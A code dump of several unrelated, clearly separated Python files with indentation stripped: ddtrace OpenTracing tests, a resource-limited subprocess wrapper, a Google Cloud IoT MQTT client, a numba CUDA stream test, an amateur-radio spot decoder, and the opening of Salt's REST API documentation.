# t1.span1/t2.span1, t2.span2, t1.span2, t1.span3, t2.span3
t1 = threading.Thread(target=trace_one)
t2 = threading.Thread(target=trace_two)
t1.start()
t2.start()
# wait for threads to finish
t1.join()
t2.join()
spans = test_spans.pop()
# trace_one will finish before trace_two so its spans should be written
# before the spans from trace_two, let's confirm this
assert spans[0].name == "11"
assert spans[1].name == "12"
assert spans[2].name == "13"
assert spans[3].name == "21"
assert spans[4].name == "22"
assert spans[5].name == "23"
# next let's ensure that each span has the correct parent:
# trace_one
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# trace_two
assert spans[3].parent_id is None
assert spans[4].parent_id is spans[3].span_id
assert spans[5].parent_id is spans[3].span_id
# finally we should ensure that the trace_ids are reasonable
# trace_one
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
# traces should be independent
assert spans[2].trace_id != spans[3].trace_id
# trace_two
assert spans[3].trace_id == spans[4].trace_id and spans[4].trace_id == spans[5].trace_id
def test_start_active_span(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one") as scope:
pass
assert scope.span._dd_span.name == "one"
assert scope.span.finished
spans = test_spans.pop()
assert spans
def test_start_active_span_finish_on_close(self, ot_tracer, test_spans):
with ot_tracer.start_active_span("one", finish_on_close=False) as scope:
pass
assert scope.span._dd_span.name == "one"
assert not scope.span.finished
spans = test_spans.pop()
assert not spans
scope.span.finish()
def test_start_active_span_nested(self, ot_tracer):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
assert ot_tracer.active_span == outer_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
with ot_tracer.start_active_span("three") as innest_scope: # why isn't it innest? innermost so verbose
assert ot_tracer.active_span == innest_scope.span
with ot_tracer.start_active_span("two") as inner_scope:
assert ot_tracer.active_span == inner_scope.span
assert ot_tracer.active_span == outer_scope.span
assert ot_tracer.active_span is None
def test_start_active_span_trace(self, ot_tracer, test_spans):
"""Test the active span of multiple nested calls of start_active_span."""
with ot_tracer.start_active_span("one") as outer_scope:
outer_scope.span.set_tag("outer", 2)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("two") as inner_scope:
inner_scope.span.set_tag("inner", 3)
with ot_tracer.start_active_span("three") as innest_scope:
innest_scope.span.set_tag("innerest", 4)
spans = test_spans.pop()
assert spans[0].parent_id is None
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
assert spans[3].parent_id is spans[2].span_id
def test_interleave(self, dd_tracer, ot_tracer, test_spans):
with ot_tracer.start_active_span("ot_root_1", ignore_active_span=True):
with dd_tracer.trace("dd_child"):
with ot_tracer.start_active_span("ot_child_1"):
pass
with ot_tracer.start_active_span("ot_child_2"):
pass
spans = test_spans.pop()
assert len(spans) == 4
assert spans[0].name == "ot_root_1" and spans[0].parent_id is None
assert spans[1].name == "dd_child" and spans[1].parent_id == spans[0].span_id
assert spans[2].name == "ot_child_1" and spans[2].parent_id == spans[1].span_id
assert spans[3].name == "ot_child_2" and spans[3].parent_id == spans[0].span_id
def test_active_span(self, ot_tracer, test_spans):
with ot_tracer._dd_tracer.trace("dd") as span:
assert ot_tracer.active_span is not None
assert ot_tracer.active_span._dd_span is span
@pytest.fixture
def nop_span_ctx():
return SpanContext(sampling_priority=AUTO_KEEP)
class TestTracerSpanContextPropagation(object):
"""Test the injection and extraction of a span context from a tracer."""
def test_invalid_format(self, ot_tracer, nop_span_ctx):
"""An invalid format should raise an UnsupportedFormatException."""
# test inject
with pytest.raises(UnsupportedFormatException):
ot_tracer.inject(nop_span_ctx, None, {})
# test extract
with pytest.raises(UnsupportedFormatException):
ot_tracer.extract(None, {})
def test_inject_invalid_carrier(self, ot_tracer, nop_span_ctx):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.inject(nop_span_ctx, Format.HTTP_HEADERS, None)
def test_extract_invalid_carrier(self, ot_tracer):
"""Only dicts should be supported as a carrier."""
with pytest.raises(InvalidCarrierException):
ot_tracer.extract(Format.HTTP_HEADERS, None)
def test_http_headers_base(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456)
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
def test_http_headers_baggage(self, ot_tracer):
"""extract should undo inject for http headers."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.HTTP_HEADERS, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.HTTP_HEADERS, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_empty_propagated_context(self, ot_tracer):
"""An empty propagated context should raise a
SpanContextCorruptedException when extracted.
"""
carrier = {}
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.HTTP_HEADERS, carrier)
def test_text(self, ot_tracer):
"""extract should undo inject for http headers"""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
ext_span_ctx = ot_tracer.extract(Format.TEXT_MAP, carrier)
assert ext_span_ctx._dd_context.trace_id == 123
assert ext_span_ctx._dd_context.span_id == 456
assert ext_span_ctx.baggage == span_ctx.baggage
def test_corrupted_propagated_context(self, ot_tracer):
"""Corrupted context should raise a SpanContextCorruptedException."""
span_ctx = SpanContext(trace_id=123, span_id=456, baggage={"test": 4, "test2": "string"})
carrier = {}
ot_tracer.inject(span_ctx, Format.TEXT_MAP, carrier)
assert len(carrier.keys()) > 0
# manually alter a key in the carrier baggage
del carrier[HTTP_HEADER_TRACE_ID]
corrupted_key = HTTP_HEADER_TRACE_ID[2:]
carrier[corrupted_key] = 123
with pytest.raises(SpanContextCorruptedException):
ot_tracer.extract(Format.TEXT_MAP, carrier)
def test_immutable_span_context(self, ot_tracer):
"""Span contexts should be immutable."""
with ot_tracer.start_span("root") as root:
ctx_before = root.context
root.set_baggage_item("test", 2)
assert ctx_before is not root.context
with ot_tracer.start_span("child") as level1:
with ot_tracer.start_span("child") as level2:
pass
assert root.context is not level1.context
assert level2.context is not level1.context
assert level2.context is not root.context
def test_inherited_baggage(self, ot_tracer):
"""Baggage should be inherited by child spans."""
with ot_tracer.start_active_span("root") as root:
# this should be passed down to the child
root.span.set_baggage_item("root", 1)
root.span.set_baggage_item("root2", 1)
with ot_tracer.start_active_span("child") as level1:
level1.span.set_baggage_item("level1", 1)
with ot_tracer.start_active_span("child") as level2:
level2.span.set_baggage_item("level2", 1)
# ensure immutability
assert level1.span.context is not root.span.context
assert level2.span.context is not level1.span.context
# level1 should have inherited the baggage of root
assert level1.span.get_baggage_item("root")
assert level1.span.get_baggage_item("root2")
# level2 should have inherited the baggage of both level1 and level2
assert level2.span.get_baggage_item("root")
assert level2.span.get_baggage_item("root2")
assert level2.span.get_baggage_item("level1")
assert level2.span.get_baggage_item("level2")
class TestTracerCompatibility(object):
"""Ensure that our opentracer produces results in the underlying datadog tracer."""
def test_required_dd_fields(self):
"""Ensure required fields needed for successful tracing are possessed
by the underlying datadog tracer.
"""
# a service name is required
tracer = Tracer("service")
with tracer.start_span("my_span") as span:
assert span._dd_span.service
def test_set_global_tracer():
"""Sanity check for set_global_tracer"""
my_tracer = Tracer("service")
set_global_tracer(my_tracer)
assert opentracing.tracer is my_tracer
assert ddtrace.tracer is my_tracer._dd_tracer
|
popen.py
|
#!/usr/bin/env python
# ~ Copyright 2014 Sjoerd Cranen, Wieger Wesselink
#~ Distributed under the Boost Software License, Version 1.0.
#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
import time
import psutil
import threading
import subprocess
class TimeExceededError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MemoryExceededError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class StackOverflowError(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Stack overflow in tool {}'.format(self.name)
class SegmentationFault(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Segmentation fault in tool {}'.format(self.name)
class ToolNotFoundError(Exception):
def __init__(self, name):
self.name = name
def __str__(self):
return 'Tool {} does not exist!'.format(self.name)
class Popen(subprocess.Popen):
def __init__(self, *args, **kwargs):
self.__maxVirtLimit = kwargs.setdefault('maxVirtLimit', 100000000)
del kwargs['maxVirtLimit']
self.__usrTimeLimit = kwargs.setdefault('usrTimeLimit', 100000000)
del kwargs['usrTimeLimit']
super(Popen, self).__init__(*args, **kwargs)
self.__usrTime = 0
self.__sysTime = 0
self.__maxVirt = 0
self.__maxResident = 0
# workaround for interface changes in psutil
process = psutil.Process(self.pid)
if "get_cpu_times" in dir(process):
self.__perfThread = threading.Thread(target=self.__measure_old)
else:
self.__perfThread = threading.Thread(target=self.__measure_new)
self.__perfThread.daemon = True
self.__perfThread.start()
# uses old interface of psutil
def __measure_old(self):
try:
process = psutil.Process(self.pid)
while self.returncode is None:
self.__usrTime, self.__sysTime = process.get_cpu_times()
virt, res = process.get_memory_info()
self.__maxVirt = max(self.__maxVirt, virt)
self.__maxResident = max(self.__maxResident, res)
if self.__maxVirt > self.__maxVirtLimit:
self.kill()
# raise MemoryExceededError(self.__maxVirt)
if self.__usrTime > self.__usrTimeLimit:
self.kill()
# raise TimeExceededError(self.__usrTime)
time.sleep(0.05)
except psutil.NoSuchProcess:
pass
# uses new interface of psutil
def __measure_new(self):
try:
process = psutil.Process(self.pid)
while self.returncode is None:
t = process.cpu_times()
m = process.memory_info()
self.__usrTime, self.__sysTime = t.user, t.system
self.__maxVirt = max(self.__maxVirt, m.vms)
self.__maxResident = max(self.__maxResident, m.rss)
if self.__maxVirt > self.__maxVirtLimit:
self.kill()
# raise MemoryExceededError(self.__maxVirt)
if self.__usrTime > self.__usrTimeLimit:
self.kill()
# raise TimeExceededError(self.__usrTime)
time.sleep(0.05)
except psutil.NoSuchProcess:
pass
@property
def user_time(self):
return self.__usrTime
@property
def system_time(self):
return self.__sysTime
@property
def max_virtual_memory(self):
return self.__maxVirt
@property
def max_resident_memory(self):
return self.__maxResident
# This requires python3
#if __name__ == '__main__':
# proc = Popen(sys.argv[1:])
# ret = proc.wait()
# print('usr/sys/virt/res: {0}/{1}/{2}/{3}'.format(proc.user_time, proc.system_time, proc.max_virtual_memory, proc.max_resident_memory), file=sys.stderr)
# sys.exit(ret)
|
core.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Python Library for connecting to Google Cloud IoT Core via MQTT, using JWT.
"""
import configparser
import datetime
import json
import logging
import os
import threading
import jwt
import paho.mqtt.client as mqtt
logger = logging.getLogger(__name__)
DEFAULT_CONFIG_LOCATION = os.path.join(os.path.dirname(__file__),
'cloud_config.ini')
class CloudIot:
"""Manages a connection to Google Cloud IoT Core via MQTT, using a JWT for device authentication.
You must configure a connection by specifying a Cloud IoT
configuration file (.ini).
Then you can use :meth:`publish_message` to
send an arbitrary message to your cloud project.
"""
def __init__(self, config_file=DEFAULT_CONFIG_LOCATION,
config_section='DEFAULT'):
"""Initialize with device configuration file.
Args:
config_file: Path to your Cloud IoT configuration file (.ini).
config_section: The section name in the .ini file where the Cloud IoT Core
config can be read. By default, it reads from the "[DEFAULT]" section.
"""
self._config = configparser.ConfigParser()
if not self._config.read(config_file):
logger.warning(
'No valid config provided (reading %s).\nCloud IoT is disabled.',
config_file)
self._enabled = False
return
if not self._config.getboolean(config_section, 'Enabled'):
logger.warning('Cloud IoT is disabled per configuration.')
self._enabled = False
return
config = self._config[config_section]
self._project_id = config['ProjectID']
self._cloud_region = config['CloudRegion']
self._registry_id = config['RegistryID']
self._device_id = config['DeviceID']
self._ca_certs = config['CACerts']
self._message_type = config['MessageType']
self._mqtt_bridge_hostname = config['MQTTBridgeHostName']
self._mqtt_bridge_port = config.getint('MQTTBridgePort')
self._mutex = threading.Lock()
# For SW, use RS256 on a key file provided in the configuration.
self._algorithm = 'RS256'
rsa_cert = config['RSACertFile']
with open(rsa_cert, 'r') as f:
self._private_key = f.read()
self._jwt_inst = jwt.PyJWT()
# Create our MQTT client. The client_id is a unique string that identifies
# this device. For Google Cloud IoT Core, it must be in the format below.
self._client = mqtt.Client(
client_id='projects/%s/locations/%s/registries/%s/devices/%s' %
(self._project_id,
self._cloud_region,
self._registry_id,
self._device_id))
# With Google Cloud IoT Core, the username field is ignored, and the
# password field is used to transmit a JWT to authorize the device.
self._client.username_pw_set(
username='unused', password=self._create_jwt())
# Start thread to create new token before timeout.
self._term_event = threading.Event()
self._token_thread = threading.Thread(
target=self._token_update_loop, args=(self._term_event,))
self._token_thread.start()
# Enable SSL/TLS support.
self._client.tls_set(ca_certs=self._ca_certs)
# Connect to the Google MQTT bridge.
self._client.connect(self._mqtt_bridge_hostname,
self._mqtt_bridge_port)
logger.info('Successfully connected to Cloud IoT')
self._enabled = True
self._client.loop_start()
# The topic that the device will receive commands on.
mqtt_command_topic = '/devices/{}/commands/#'.format(self._device_id)
# Subscribe to the commands topic, QoS 1 enables message acknowledgement.
self._client.subscribe(mqtt_command_topic, qos=1)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
if self._enabled:
# Terminate token thread.
self._term_event.set()
self._token_thread.join()
def enabled(self):
"""Checks whether or not Clout Iot Core is enabled, as per the config file's "Enabled" boolean.
Returns:
True if Cloud Iot Core is enabled, False if it's disabled.
"""
return self._enabled
def project_id(self):
return self._project_id
def publish_message(self, message):
"""Sends an arbitrary message to the Cloud Iot Core service.
Args:
message: The message to send. It can be any message that's serializable
into a JSON message using :func:`json.dumps` (such as a dictionary or
string).
"""
if not self._enabled:
return
with self._mutex:
# Publish to the events or state topic based on the flag.
sub_topic = 'events' if self._message_type == 'event' else 'state'
mqtt_topic = '/devices/%s/%s' % (self._device_id, sub_topic)
# Publish payload using JSON dumps to create bytes representation.
payload = json.dumps(message)
# Publish payload to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
self._client.publish(mqtt_topic, payload, qos=1)
def register_message_callbacks(self, callbacks):
"""Specifies functions to call upon various MQTT pub/sub messages.
Args:
callbacks: A dict mapping of callback names from `paho.mqtt.client
callbacks <https://pypi.org/project/paho-mqtt/#callbacks>`_
to your own function names.
"""
if 'on_connect' in callbacks:
self._client.on_connect = callbacks['on_connect']
if 'on_disconnect' in callbacks:
self._client.on_disconnect = callbacks['on_disconnect']
if 'on_publish' in callbacks:
self._client.on_publish = callbacks['on_publish']
if 'on_message' in callbacks:
self._client.on_message = callbacks['on_message']
if 'on_unsubscribe' in callbacks:
self._client.on_unsubscribe = callbacks['on_unsubscribe']
if 'on_log' in callbacks:
self._client.on_log = callbacks['on_log']
def _token_update_loop(self, term_event):
"""Update token every 50 minutes (of allowed 60).
Args:
term_event: termination thread event.
"""
while not term_event.wait(50 * 60):
with self._mutex:
self._client.disconnect()
# Set new token.
self._client.username_pw_set(
username='unused', password=self._create_jwt())
# Connect to the Google MQTT bridge.
self._client.connect(
self._mqtt_bridge_hostname, self._mqtt_bridge_port)
logger.info(
'Successfully re-established connection with new token')
def _create_jwt(self):
"""Creates a JWT (https://jwt.io) to establish an MQTT connection.
Returns:
An MQTT generated from the given project_id and private key, which
expires in 20 minutes. After 20 minutes, your client will be
disconnected, and a new JWT will have to be generated.
"""
token = {
# The time that the token was issued at
'iat': datetime.datetime.utcnow(),
# The time the token expires.
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60),
# The audience field should always be set to the GCP project id.
'aud': self._project_id
}
return self._jwt_inst.encode(token, self._private_key,
algorithm=self._algorithm)
|
test_ptds.py
|
import multiprocessing as mp
import logging
import traceback
from numba.cuda.testing import unittest, CUDATestCase
from numba.cuda.testing import skip_on_cudasim, xfail_with_cuda_python
def child_test():
from numba import cuda, int32, void
from numba.core import config
import io
import numpy as np
import threading
# Enable PTDS before we make any CUDA driver calls. Enabling it first
# ensures that PTDS APIs are used because the CUDA driver looks up API
# functions on first use and memoizes them.
config.CUDA_PER_THREAD_DEFAULT_STREAM = 1
# Set up log capture for the Driver API so we can see what API calls were
# used.
logbuf = io.StringIO()
handler = logging.StreamHandler(logbuf)
cudadrv_logger = logging.getLogger('numba.cuda.cudadrv.driver')
cudadrv_logger.addHandler(handler)
cudadrv_logger.setLevel(logging.DEBUG)
# Set up data for our test, and copy over to the device
N = 2 ** 16
N_THREADS = 10
N_ADDITIONS = 4096
# Seed the RNG for repeatability
np.random.seed(1)
x = np.random.randint(low=0, high=1000, size=N, dtype=np.int32)
r = np.zeros_like(x)
# One input and output array for each thread
xs = [cuda.to_device(x) for _ in range(N_THREADS)]
rs = [cuda.to_device(r) for _ in range(N_THREADS)]
# Compute the grid size and get the [per-thread] default stream
n_threads = 256
n_blocks = N // n_threads
stream = cuda.default_stream()
# A simple multiplication-by-addition kernel. What it does exactly is not
# too important; only that we have a kernel that does something.
@cuda.jit(void(int32[::1], int32[::1]))
def f(r, x):
i = cuda.grid(1)
if i > len(r):
return
# Accumulate x into r
for j in range(N_ADDITIONS):
r[i] += x[i]
# This function will be used to launch the kernel from each thread on its
# own unique data.
def kernel_thread(n):
f[n_blocks, n_threads, stream](rs[n], xs[n])
# Create threads
threads = [threading.Thread(target=kernel_thread, args=(i,))
for i in range(N_THREADS)]
# Start all threads
for thread in threads:
thread.start()
# Wait for all threads to finish, to ensure that we don't synchronize with
# the device until all kernels are scheduled.
for thread in threads:
thread.join()
# Synchronize with the device
cuda.synchronize()
# Check output is as expected
expected = x * N_ADDITIONS
for i in range(N_THREADS):
np.testing.assert_equal(rs[i].copy_to_host(), expected)
# Return the driver log output to the calling process for checking
handler.flush()
return logbuf.getvalue()
def child_test_wrapper(result_queue):
try:
output = child_test()
success = True
# Catch anything raised so it can be propagated
except: # noqa: E722
output = traceback.format_exc()
success = False
result_queue.put((success, output))
@skip_on_cudasim('Streams not supported on the simulator')
class TestPTDS(CUDATestCase):
@xfail_with_cuda_python
def test_ptds(self):
# Run a test with PTDS enabled in a child process
ctx = mp.get_context('spawn')
result_queue = ctx.Queue()
proc = ctx.Process(target=child_test_wrapper, args=(result_queue,))
proc.start()
proc.join()
success, output = result_queue.get()
# Ensure the child process ran to completion before checking its output
if not success:
self.fail(output)
# Functions with a per-thread default stream variant that we expect to
# see in the output
ptds_functions = ('cuMemcpyHtoD_v2_ptds', 'cuLaunchKernel_ptsz',
'cuMemcpyDtoH_v2_ptds')
for fn in ptds_functions:
with self.subTest(fn=fn, expected=True):
self.assertIn(fn, output)
# Non-PTDS versions of the functions that we should not see in the
# output:
legacy_functions = ('cuMemcpyHtoD_v2', 'cuLaunchKernel',
'cuMemcpyDtoH_v2')
for fn in legacy_functions:
with self.subTest(fn=fn, expected=False):
# Ensure we only spot these function names appearing without a
# _ptds or _ptsz suffix by checking including the end of the
# line in the log
fn_at_end = f'{fn}\n'
self.assertNotIn(fn_at_end, output)
if __name__ == '__main__':
unittest.main()
|
spot_decoder.py
|
#!/usr/bin/env python
#
# Author: Alexander Sholohov <ra9yer@yahoo.com>
#
# License: MIT
#
import sys
import os
import re
import subprocess
import signal
import time
import datetime
import wave
import StringIO
import threading
import httplib, urllib
import urlparse
from inspect import isfunction
#--------------------------------------------
def utc_time_15s_rounded():
x = datetime.datetime.utcnow() + datetime.timedelta(seconds=5)
discard = datetime.timedelta(seconds=(x.second % 15), microseconds=x.microsecond)
return x - discard
#--------------------------------------------
def doPOST(url, src, magicKey, mode, utcTime, dbRatio, dtShift, freq, message):
if not url:
return
rec = {}
rec['mode'] = mode
rec['utc_time'] = utcTime
rec['db_ratio'] = dbRatio
rec['dt_shift'] = dtShift
rec['freq'] = freq
rec['src'] = src
rec['magic_key'] = magicKey
rec['message'] = message
params = urllib.urlencode(rec)
headers = {"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain"}
netparam = urlparse.urlparse(url)
conn = httplib.HTTPConnection(netparam.netloc)
conn.request("POST", netparam.path, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
#--------------------------------------------
def is_callsign(s):
m = re.search('^[A-Z]{1,2}[0-9][A-Z]{1,3}$', s)
return m != None
#--------------------------------------------
def is_valid_callsign_in_array(arr):
for s in arr:
if not is_callsign(s):
continue
for elm in cfg.CALLSIGN_PREFIXES:
if s.startswith(elm):
return True
return False
#--------------------------------------------
def decoder_proc(waveName, utcTime, outBaseName):
decodeStartedStamp = datetime.datetime.now()
if not os.path.isfile(waveName):
print 'File {} not exist'.format(waveName)
return
# raise Exception('File {} not exist'.format(waveName))
print "Decoding {0}...".format(waveName)
occupiedFileNames = {}
prepareToSend = []
for mode, isFilterNeeded, cmdLine, parser in cfg.DECODER_CHAIN:
print "Process mode: ", mode, isFilterNeeded
fullCmdLine = cmdLine + [waveName]
print "fullCmdLine=", fullCmdLine
p = subprocess.Popen(fullCmdLine, shell=False, stdout=subprocess.PIPE)
outdata, errdata = p.communicate()
if errdata:
print "errdata=", errdata
print "OutData=", outdata
validLineFound = False
for line in StringIO.StringIO(outdata):
params = parser(line)
if not params['is_valid']:
continue
# check for empty message
if not params['message'].strip():
continue
validLineFound = True
if 'utc_time' in params:
utcPrintableTime = params['utc_time']
else:
utcPrintableTime = utcTime.strftime("%H%M%S") if mode.startswith("msk") else utcTime.strftime("%H%M")
itemToSend = (mode, utcPrintableTime, params['snr'].strip(), params['drift'].strip(), params['freq'].strip(), params['message'].strip())
if not isFilterNeeded or is_valid_callsign_in_array(params['message'].split()):
prepareToSend.append(itemToSend)
if validLineFound and cfg.KEEP_DECODED_RESULT:
for suffix in ["", "-1", "-2", "-3", "-4", "-5", "-6"]:
fname = "{}-{}{}.txt".format(outBaseName, mode, suffix)
if fname not in occupiedFileNames:
break
occupiedFileNames[fname] = 1
with open(fname, "w") as fv:
fv.write(outdata)
# remove duplicates
newPrepareToSend = [elm for n,elm in enumerate(prepareToSend) if elm not in prepareToSend[:n]]
# post
for item in newPrepareToSend:
print "Publish to {0}; item={1}".format(cfg.HTTP_SPOT_URI, item)
mode, utcPrintableTime, dbRatio, dtShift, freq, message = item
doPOST(cfg.HTTP_SPOT_URI, cfg.SRC, cfg.POST_MAGIC_KEY, mode, utcPrintableTime, dbRatio, dtShift, freq, message)
# save flac
if len(newPrepareToSend)>0 and cfg.KEEP_DECODED_RESULT:
# compress
print "Compress flac..."
p = subprocess.Popen([cfg.FLAC_CMD, waveName], shell=False, stdout=subprocess.PIPE)
p.communicate()
# delete original wav file
if hasattr(cfg, "KEEP_WAV_FILES") and cfg.KEEP_WAV_FILES:
print "Keep wav file"
else:
print "Remove wav file"
os.remove(waveName)
decodeEndedStamp = datetime.datetime.now()
diff = decodeEndedStamp - decodeStartedStamp
print "Done. decode_duration={0}".format(diff.total_seconds())
#--------------------------------------------
def main():
while(True):
# wait begin of minute (actual 5x second)
print "Wait for start..."
cnt = 0
while True:
dStart = datetime.datetime.now()
s = int(dStart.minute * 60.0 + dStart.second + dStart.microsecond / 1000000.0 + cfg.LEAD_START_IN_SECONDS)
if s % int(cfg.START_INTERVAL_IN_SECONDS) == 0:
break
time.sleep(0.1)
cnt += 1
if cnt % 50 == 0:
print "second=", dStart.second
print "Started at {0}".format( str(dStart) )
utcTime = utc_time_15s_rounded()
if isfunction(cfg.WORKING_DIR):
dirName = cfg.WORKING_DIR(utcTime)
else:
dirName = cfg.WORKING_DIR
if not os.path.exists(dirName):
os.makedirs(dirName)
baseName = cfg.BASE_FILE_NAME(dirName, dStart, utcTime)
rawName = baseName + ".raw"
waveName = baseName + ".wav"
fv = open(rawName, "wb")
print "Start write to {0}".format(rawName)
cn = []
for item in cfg.CMD_CHAIN:
if len(cn) == 0:
p = subprocess.Popen(item, shell=False, stdout=subprocess.PIPE ) # first
elif len(cn) == len(cfg.CMD_CHAIN) - 1 :
p = subprocess.Popen(item, shell=False, stdin=cn[-1].stdout, stdout=fv) # last
else:
p = subprocess.Popen(item, shell=False, stdin=cn[-1].stdout, stdout=subprocess.PIPE) # middle
cn.append(p)
print "Writing...Wait for end record..."
cnt = 0
while True:
dCurr = datetime.datetime.now()
diff = dCurr - dStart
if diff.total_seconds() > cfg.RECORD_DURATION_IN_SECONDS:
break
if cnt % 20 == 0:
print "seconds writed =", diff.total_seconds()
time.sleep(0.25)
cnt += 1
print "Terminating..."
# kill entire chain
os.kill(cn[0].pid, signal.SIGTERM)
for item in cn:
item.wait()
print "Record ended."
numBytes = fv.tell()
fv.close()
# prepend wav header
with open(waveName, "wb") as dst, open(rawName, "rb") as fv:
w = wave.Wave_write(dst)
w.setparams((1, 2, cfg.AUDIO_SAMPLE_RATE, numBytes/2, 'NONE', 'NONE'))
w.writeframesraw(fv.read())
w.close()
os.remove(rawName) # delete raw file
print "waveName=", waveName
t1 = threading.Thread(target=decoder_proc, args=(waveName, utcTime, baseName))
t1.start()
#--------------------------------------------
if __name__ == '__main__':
# === Load configuration script ===
if len(sys.argv)==1:
config_script = 'spot_cfg'
else:
config_script = sys.argv[1]
print "use config script {0}.py".format(config_script)
cfg = __import__(config_script)
main()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` function in Salt (note
the dependencies for this module).
.. code-block:: bash
% salt-call tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request.
.. glossary::
lowstate
A dictionary containing various keys that instruct Salt which command
to run, where that command lives, any parameters for that command, any
authentication credentials, what returner to use, etc.
Salt uses the lowstate data format internally in many places to pass
command data between functions. Salt also uses lowstate for the
:ref:`LocalClient() <python-api>` Python API interface.
The following example (in JSON format) causes Salt to execute two commands::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
